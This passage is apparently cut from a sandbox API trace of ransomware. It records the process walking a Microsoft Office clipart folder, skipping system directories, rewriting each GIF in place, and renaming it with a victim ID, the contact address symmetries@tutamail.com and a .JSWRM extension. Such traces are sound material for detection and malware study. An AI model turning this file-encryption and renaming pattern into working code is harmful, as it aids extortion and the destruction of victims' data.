out: hHeap=0x1e0000) returned 1 [0099.941] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0099.941] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1107d049, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1107d049, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1107d049, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x412, dwReserved0=0x60002, dwReserved1=0x241c82, cFileName="J0143752.GIF", cAlternateFileName="")) returned 1 [0099.941] lstrcmpiW (lpString1="J0143752.GIF", lpString2=".") returned 1 [0099.941] lstrcmpiW (lpString1="J0143752.GIF", lpString2="..") returned 1 [0099.941] lstrcmpiW (lpString1="J0143752.GIF", lpString2="...") returned 1 [0099.941] lstrcmpiW (lpString1="J0143752.GIF", lpString2="windows") returned -1 [0099.941] lstrcmpiW (lpString1="J0143752.GIF", lpString2="recovery") returned -1 [0099.941] lstrcmpiW (lpString1="J0143752.GIF", lpString2="perflogs") returned -1 [0099.941] lstrcmpiW (lpString1="J0143752.GIF", lpString2="documents and settings") returned 1 [0099.941] lstrcmpiW (lpString1="J0143752.GIF", lpString2="$RECYCLE.BIN") returned 1 [0099.941] lstrcmpiW (lpString1="J0143752.GIF", lpString2="system volume information") returned -1 [0099.941] lstrcmpiW (lpString1="J0143752.GIF", lpString2="msocache") returned -1 [0099.941] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0099.941] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0143752.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.941] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0143752.GIF", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0143752.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.941] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0099.941] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0099.941] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0143752.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.941] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0143752.GIF", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0143752.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.941] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0099.941] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2363b0 [0099.941] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0099.941] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0099.941] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0099.941] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0099.941] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\J0143752.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\j0143752.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0099.942] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=1042) returned 1 [0099.942] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.942] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x410) returned 0x230a00 [0099.942] ReadFile (in: hFile=0x338, lpBuffer=0x230a00, nNumberOfBytesToRead=0x410, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesRead=0x345e534*=0x410, lpOverlapped=0x0) returned 1 [0099.943] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.943] WriteFile (in: hFile=0x338, lpBuffer=0x230a00*, nNumberOfBytesToWrite=0x410, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesWritten=0x345e530*=0x410, lpOverlapped=0x0) returned 1 [0099.944] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x230a00 | out: hHeap=0x1e0000) returned 1 [0099.944] CloseHandle (hObject=0x338) returned 1 [0099.944] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0099.944] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0099.944] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0099.944] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0099.944] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0099.944] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0099.944] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0099.944] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3a8 [0099.944] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3a8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0099.944] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3a8 | out: hHeap=0x1e0000) returned 1 [0099.944] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236520 [0099.944] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e9d0 [0099.944] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236520 | out: hHeap=0x1e0000) returned 1 [0099.944] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0099.944] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\J0143752.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\j0143752.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\J0143752.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\j0143752.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0099.945] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e9d0 | out: hHeap=0x1e0000) returned 1 [0099.945] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0099.945] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0099.945] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1107d049, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1107d049, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1107d049, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1b7f, dwReserved0=0x60002, dwReserved1=0x241c82, cFileName="J0143753.GIF", cAlternateFileName="")) returned 1 [0099.945] lstrcmpiW (lpString1="J0143753.GIF", lpString2=".") returned 1 [0099.945] lstrcmpiW (lpString1="J0143753.GIF", lpString2="..") returned 1 [0099.945] lstrcmpiW (lpString1="J0143753.GIF", lpString2="...") returned 1 [0099.945] lstrcmpiW (lpString1="J0143753.GIF", lpString2="windows") returned -1 [0099.945] lstrcmpiW (lpString1="J0143753.GIF", lpString2="recovery") returned -1 [0099.945] lstrcmpiW (lpString1="J0143753.GIF", lpString2="perflogs") returned -1 [0099.945] lstrcmpiW (lpString1="J0143753.GIF", lpString2="documents and settings") returned 1 [0099.945] lstrcmpiW (lpString1="J0143753.GIF", lpString2="$RECYCLE.BIN") returned 1 [0099.945] lstrcmpiW (lpString1="J0143753.GIF", lpString2="system volume information") returned -1 [0099.945] lstrcmpiW (lpString1="J0143753.GIF", lpString2="msocache") returned -1 [0099.945] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0099.945] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0143753.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.945] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0143753.GIF", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0143753.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.945] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0099.945] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0099.945] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0143753.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.945] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0143753.GIF", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0143753.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.946] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0099.946] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0099.946] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2363b0 | out: hHeap=0x1e0000) returned 1 [0099.946] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0099.946] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0099.946] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0099.946] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\J0143753.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\j0143753.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0099.947] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=7039) returned 1 [0099.947] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.947] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1b70) returned 0x24d210 [0099.947] ReadFile (in: hFile=0x338, lpBuffer=0x24d210, nNumberOfBytesToRead=0x1b70, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e534*=0x1b70, lpOverlapped=0x0) returned 1 [0099.948] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.949] WriteFile (in: hFile=0x338, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x1b70, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e530*=0x1b70, lpOverlapped=0x0) returned 1 [0099.949] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0099.949] CloseHandle (hObject=0x338) returned 1 [0099.949] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0099.949] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0099.949] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0099.949] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0099.949] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0099.949] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0099.949] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0099.949] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0099.949] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0099.949] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0099.949] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0099.949] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e9d0 [0099.949] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0099.949] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0099.949] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\J0143753.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\j0143753.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\J0143753.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\j0143753.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0099.950] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e9d0 | out: hHeap=0x1e0000) returned 1 [0099.950] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0099.950] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0099.950] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1107d049, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1107d049, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1107d049, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x6ad, dwReserved0=0x60002, dwReserved1=0x241c82, cFileName="J0143754.GIF", cAlternateFileName="")) returned 1 [0099.950] lstrcmpiW (lpString1="J0143754.GIF", lpString2=".") returned 1 [0099.950] lstrcmpiW (lpString1="J0143754.GIF", lpString2="..") returned 1 [0099.950] lstrcmpiW (lpString1="J0143754.GIF", lpString2="...") returned 1 [0099.950] lstrcmpiW (lpString1="J0143754.GIF", lpString2="windows") returned -1 [0099.950] lstrcmpiW (lpString1="J0143754.GIF", lpString2="recovery") returned -1 [0099.950] lstrcmpiW (lpString1="J0143754.GIF", lpString2="perflogs") returned -1 [0099.950] lstrcmpiW (lpString1="J0143754.GIF", lpString2="documents and settings") returned 1 [0099.950] lstrcmpiW (lpString1="J0143754.GIF", lpString2="$RECYCLE.BIN") returned 1 [0099.950] lstrcmpiW (lpString1="J0143754.GIF", lpString2="system volume information") returned -1 [0099.950] lstrcmpiW (lpString1="J0143754.GIF", lpString2="msocache") returned -1 [0099.950] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0099.950] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0143754.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.950] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0143754.GIF", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0143754.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.950] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0099.950] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0099.950] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0143754.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.950] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0143754.GIF", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0143754.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.950] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0099.950] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0099.951] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0099.951] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0099.951] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0099.951] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0099.951] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\J0143754.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\j0143754.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0099.951] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=1709) returned 1 [0099.951] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.951] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x6a0) returned 0x22d530 [0099.951] ReadFile (in: hFile=0x338, lpBuffer=0x22d530, nNumberOfBytesToRead=0x6a0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x22d530*, lpNumberOfBytesRead=0x345e534*=0x6a0, lpOverlapped=0x0) returned 1 [0099.953] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.953] WriteFile (in: hFile=0x338, lpBuffer=0x22d530*, nNumberOfBytesToWrite=0x6a0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x22d530*, lpNumberOfBytesWritten=0x345e530*=0x6a0, lpOverlapped=0x0) returned 1 [0099.953] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d530 | out: hHeap=0x1e0000) returned 1 [0099.953] CloseHandle (hObject=0x338) returned 1 [0099.953] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0099.953] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0099.953] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0099.953] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0099.953] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0099.953] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0099.953] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0099.953] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0099.953] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0099.953] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0099.953] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0099.953] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e228 [0099.953] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0099.953] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0099.953] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\J0143754.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\j0143754.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\J0143754.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\j0143754.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0099.955] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e228 | out: hHeap=0x1e0000) returned 1 [0099.955] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0099.955] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0099.955] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1107d049, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1107d049, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x110a3267, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x69f, dwReserved0=0x60002, dwReserved1=0x241c82, cFileName="J0143758.GIF", cAlternateFileName="")) returned 1 [0099.955] lstrcmpiW (lpString1="J0143758.GIF", lpString2=".") returned 1 [0099.955] lstrcmpiW (lpString1="J0143758.GIF", lpString2="..") returned 1 [0099.955] lstrcmpiW (lpString1="J0143758.GIF", lpString2="...") returned 1 [0099.955] lstrcmpiW (lpString1="J0143758.GIF", lpString2="windows") returned -1 [0099.955] lstrcmpiW (lpString1="J0143758.GIF", lpString2="recovery") returned -1 [0099.955] lstrcmpiW (lpString1="J0143758.GIF", lpString2="perflogs") returned -1 [0099.955] lstrcmpiW (lpString1="J0143758.GIF", lpString2="documents and settings") returned 1 [0099.955] lstrcmpiW (lpString1="J0143758.GIF", lpString2="$RECYCLE.BIN") returned 1 [0099.955] lstrcmpiW (lpString1="J0143758.GIF", lpString2="system volume information") returned -1 [0099.955] lstrcmpiW (lpString1="J0143758.GIF", lpString2="msocache") returned -1 [0099.955] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0099.955] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0143758.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.955] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0143758.GIF", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0143758.GIF", 